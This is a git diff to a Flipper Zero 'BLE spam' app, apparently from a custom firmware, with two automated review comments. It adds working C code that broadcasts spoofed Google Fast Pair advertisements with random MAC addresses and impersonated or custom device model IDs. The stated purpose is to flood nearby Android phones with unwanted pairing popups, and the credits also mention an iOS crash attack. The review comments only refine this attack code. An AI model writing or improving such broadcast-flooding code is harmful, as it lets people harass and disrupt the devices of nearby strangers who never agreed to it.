diff --git a/applications/external/ble_spam/application.fam b/applications/external/ble_spam/application.fam index 1f0c019f1..d66dbeb14 100644 --- a/applications/external/ble_spam/application.fam +++ b/applications/external/ble_spam/application.fam @@ -6,7 +6,7 @@ App( stack_size=4 * 1024, fap_icon="ble_spam_10px.png", fap_category="Bluetooth", - fap_author="@Willy-JL & @ECTO-1A", + fap_author="@Willy-JL @ECTO-1A @Spooks4576", fap_weburl="https://github.com/Flipper-XFW/Xtreme-Apps/tree/dev/ble_spam", fap_version="2.0", fap_description="Flood BLE advertisements to cause spammy and annoying popups/notifications", diff --git a/applications/external/ble_spam/ble_spam.c b/applications/external/ble_spam/ble_spam.c index 9a440471d..82903121a 100644 --- a/applications/external/ble_spam/ble_spam.c +++ b/applications/external/ble_spam/ble_spam.c @@ -7,7 +7,8 @@ // Hacked together by @Willy-JL // Custom adv API by @Willy-JL (idea by @xMasterX) // iOS 17 Crash by @ECTO-1A -// Research on behaviors and parameters by @Willy-JL and @ECTO-1A +// Android Pairs by @Spooks4576 and @ECTO-1A +// Research on behaviors and parameters by @Willy-JL, @ECTO-1A and @Spooks4576 // Controversy explained at https://willyjl.dev/blog/the-controversy-behind-apple-ble-spam typedef struct { @@ -84,6 +85,19 @@ static Attack attacks[] = { }, }, }, + { + .title = "Android Device Pair", + .text = "~15min cooldown, long range", + .payload = + { + .random_mac = true, + .protocol = &ble_spam_protocol_fastpair, + .msg = + { + .fastpair = {}, + }, + }, + }, }; #define ATTACK_COUNT ((signed)COUNT_OF(attacks)) @@ -242,7 +256,7 @@ static void draw_callback(Canvas* canvas, void* ctx) { AlignTop, "App+Spam: \e#WillyJL\e# XFW\n" "Apple+Crash: \e#ECTO-1A\e#\n" - "\n" + "Android: \e#Spooks4576\e#\n" " Version \e#2.0\e#", false); break; 
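Review bot: In the new `Android Device Pair` entry added to `attacks[]` in ble_spam.c, `.fastpair = {}` is an empty initializer, which is a compiler extension before C23. It also hides that a zero `model_id` is what sends fastpair_make_packet down its random-model branch. Writing `.fastpair = {.model_id = 0x000000}, // 0 = model chosen at random per packet` would be portable and state that contract where the entry is defined. The `attacks[]` array begins before this hunk, so it is not visible here whether the existing entries follow the same convention.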
diff --git a/applications/external/ble_spam/icons/android.png b/applications/external/ble_spam/icons/android.png new file mode 100644 index 000000000..efd5b28cb Binary files /dev/null and b/applications/external/ble_spam/icons/android.png differ diff --git a/applications/external/ble_spam/protocols/_registry.c b/applications/external/ble_spam/protocols/_registry.c index 2481cf1a4..9ede92816 100644 --- a/applications/external/ble_spam/protocols/_registry.c +++ b/applications/external/ble_spam/protocols/_registry.c @@ -2,6 +2,7 @@ const BleSpamProtocol* ble_spam_protocols[] = { &ble_spam_protocol_continuity, + &ble_spam_protocol_fastpair, }; const size_t ble_spam_protocols_count = COUNT_OF(ble_spam_protocols); diff --git a/applications/external/ble_spam/protocols/_registry.h b/applications/external/ble_spam/protocols/_registry.h index b2e05db88..f4c41c4f4 100644 --- a/applications/external/ble_spam/protocols/_registry.h +++ b/applications/external/ble_spam/protocols/_registry.h @@ -1,9 +1,11 @@ #pragma once #include "continuity.h" +#include "fastpair.h" union BleSpamMsg { ContinuityMsg continuity; + FastpairMsg fastpair; }; extern const BleSpamProtocol* ble_spam_protocols[]; diff --git a/applications/external/ble_spam/protocols/fastpair.c b/applications/external/ble_spam/protocols/fastpair.c new file mode 100644 index 000000000..5cd91dd66 --- /dev/null +++ b/applications/external/ble_spam/protocols/fastpair.c 
@@ -0,0 +1,72 @@
+#include "fastpair.h"
+#include "_registry.h"
+
+// Hacked together by @Willy-JL and @Spooks4576
+// Documentation at https://developers.google.com/nearby/fast-pair/specifications/introduction
+
+const char* fastpair_get_name(const BleSpamMsg* _msg) {
+ const FastpairMsg* msg = &_msg->fastpair;
+ UNUSED(msg);
+ return "FastPair";
+}
+
+void fastpair_make_packet(uint8_t* out_size, uint8_t** out_packet, const BleSpamMsg* _msg) {
+ const FastpairMsg* msg = _msg ? &_msg->fastpair : NULL;
+
+ uint32_t model_id;
+ if(msg && msg->model_id != 0x000000) {
+ model_id = msg->model_id;
+ } else {
+ const uint32_t models[] = {
+ // Genuine devices
+ 0xCD8256, // Bose NC 700
+ 0xF52494, // JBL Buds Pro
+ 0x718FA4, // JBL Live 300TWS
+ 0x821F66, // JBL Flip 6
+ 0x92BBBD, // Pixel Buds
+
+ // Custom debug popups
+ 0xAA1FE1, // ClownMaster
+ 0xAA187F, // VBucks
+ 0xF38C02, // Boykisser
+ 0x1448C9, // BLM
+ 0xD5AB33, // Xtreme
+ 0x13B39D, // Talking Sasquach
+ };
+ model_id = models[rand() % COUNT_OF(models)];
+ }
+
+ uint8_t size = 17;
+ uint8_t* packet = malloc(size);
+ uint8_t i = 0;
+
+ packet[i++] = 2; // Size
+ packet[i++] = 0x01; // AD Type (Flags)
+ packet[i++] = 0x02 + (0x04 * (rand() % 2)); // GENERAL_DISC_MODE + maybe BR_EDR_NOT_SUPPORTED
+
+ packet[i++] = 3; // Size
+ packet[i++] = 0x03; // AD Type (Service UUID List)
+ packet[i++] = 0x2C; // Service UUID (Google LLC, FastPair)
+ packet[i++] = 0xFE; // ...
+
+ packet[i++] = 6; // Size
+ packet[i++] = 0x16; // AD Type (Service Data)
+ packet[i++] = 0x2C; // Service UUID (Google LLC, FastPair)
+ packet[i++] = 0xFE; // ...
+ packet[i++] = (model_id >> 0x10) & 0xFF; // Model ID
+ packet[i++] = (model_id >> 0x08) & 0xFF; // ...
+ packet[i++] = (model_id >> 0x00) & 0xFF; // ...
+
+ packet[i++] = 2; // Size
+ packet[i++] = 0x0A; // AD Type (Tx Power Level)
+ packet[i++] = (rand() % 120) - 100; // -100 to +20 dBm
+
+ *out_size = size;
+ *out_packet = packet;
+}
+
+const BleSpamProtocol ble_spam_protocol_fastpair = {
+ .icon = &I_android,
+ .get_name = fastpair_get_name,
+ .make_packet = fastpair_make_packet,
+};
diff --git a/applications/external/ble_spam/protocols/fastpair.h b/applications/external/ble_spam/protocols/fastpair.h
new file mode 100644
index 000000000..6555d0b6b
--- /dev/null
+++ b/applications/external/ble_spam/protocols/fastpair.h
@@ -0,0 +1,11 @@
+#pragma once
+#include "_base.h"
+
+// Hacked together by @Willy-JL and @Spooks4576
+// Documentation at https://developers.google.com/nearby/fast-pair/specifications/introduction
+
+typedef struct {
+ uint32_t model_id;
+} FastpairMsg;
+
+extern const BleSpamProtocol ble_spam_protocol_fastpair;
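Review bot: In fastpair_make_packet (protocols/fastpair.c) the buffer length is the literal `17` while the write index `i` is advanced by hand, so a later edit to the AD structures can write past the allocation or leave it under-filled with no signal. Adding `furi_assert(i == size);` just before `*out_size = size;` would pin the two together. The Tx Power comment says `-100 to +20 dBm`, but `(rand() % 120) - 100` yields -100..+19 and the negative `int` is narrowed into a `uint8_t` implicitly; the comment should read `// -100 to +19 dBm, signed 8-bit` and the store should cast explicitly, `(uint8_t)(int8_t)((rand() % 120) - 100)`. fastpair_get_name also forms `&_msg->fastpair` without the NULL guard that fastpair_make_packet applies to the same parameter; since the value is never used, `UNUSED(_msg);` alone would be consistent.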